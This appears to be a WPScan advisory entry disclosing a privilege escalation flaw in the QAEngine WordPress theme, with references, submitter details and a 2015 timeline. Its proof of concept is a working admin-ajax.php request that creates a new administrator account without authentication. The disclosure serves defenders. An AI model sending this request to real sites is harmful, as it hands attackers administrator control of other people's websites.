QAEngine Theme - Privilege Escalation
Sign up to our free email alerts service for instant vulnerability notifications!| Description | QAEngine vulnerability allows an attacker to have an administrator account on the target's website. |
| Proof of Concept | http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator |
Affects
| Theme |
|
References
| PACKETSTORM | 131648 |
| URL | http://web.archive.org/web/20150912144515/http://research.evex.pw/?vuln=10 |
Classification
| Type | BYPASS |
Miscellaneous
| Submitter | A. Samman |
| Submitter Twitter | Evex_1337 |
| Views | 303 |
| Verified | No |
| WPVDB ID | 7885 |
Timeline
| Publicly Published | 2015-04-06 (over 2 years ago) |
| Added | 2015-04-07 (over 2 years ago) |
| Last Updated | 2016-04-24 (about 1 year ago) |
Copyright & License
| Copyright | All data and resources contained within this page and this web site is Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us. |
